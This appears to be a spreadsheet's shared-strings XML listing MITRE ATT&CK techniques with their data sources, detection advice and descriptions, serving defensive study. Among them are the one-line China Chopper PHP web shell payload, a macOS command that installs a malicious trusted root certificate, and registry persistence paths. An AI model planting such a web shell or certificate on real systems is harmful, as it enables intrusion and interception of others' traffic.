Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>credential-access,persistence</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</t>
  </si>
  <si>
    <t>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[Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Windows Security Support Provider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
 (Citation: Graeber 2014)</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.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Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>command-and-control,defense-evasion</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns)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t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
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
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>Remote File Copy</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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</si>
  <si>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Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).</t>
  </si>
  <si>
    <t>command-and-control,lateral-movement</t>
  </si>
  <si>
    <t>Execution through API</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.</t>
  </si>
  <si>
    <t>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
* CreateProcessA() and CreateProcessW(),
* CreateProcessAsUserA() and CreateProcessAsUserW(),
* CreateProcessInternalA() and CreateProcessInternalW(),
* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
* LoadLibraryA() and LoadLibraryW(),
* LoadLibraryExA() and LoadLibraryExW(),
* LoadModule(),
* LoadPackagedLibrary(),
* WinExec(),
* ShellExecuteA() and ShellExecuteW(),
* ShellExecuteExA() and ShellExecuteExW()</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.</t>
  </si>
  <si>
    <t>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.</t>
  </si>
  <si>
    <t>defense-evasion,persistence</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Disk forensics,API monitoring,Process monitoring,Component firmware</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Kernel drivers</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>Use of two- or multifactor authentication is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. Adversaries may target authentication mechanisms, such as smart cards, to gain access to systems, services, and network resources.
If a smart card is used for two-factor authentication (2FA),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 (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry.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 which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
### Mac
On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.
### Linux
On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;. (Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
### Windows
Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) 
### Mac
OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents  (Citation: Operating with EmPyre).</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention,Process command-line parameters</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior.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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Remote File Copy](https://attack.mitre.org/techniques/T1105) to identify and move files.</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations replacing know binary paths with unknown paths. Even though some third party applications define user COM objects, the presence of objects within &lt;code&gt;HKEY_CURRENT_USER\Software\Classes\CLSID\&lt;/code&gt; may be anomalous and should be investigated since user objects will be loaded prior to machine objects in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;. (Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.</t>
  </si>
  <si>
    <t>Audio Capture</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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>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</si>
  <si>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System Time Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Windows,macOS</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</si>
  <si>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video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</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</si>
  <si>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Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</t>
  </si>
  <si>
    <t>The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)
Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)</t>
  </si>
  <si>
    <t>Execution through Module Load</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Digital certificate logs</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia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 (Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&lt;target binary&gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,  MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>API monitoring,Access tokens,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any Shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Linux,macOS</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
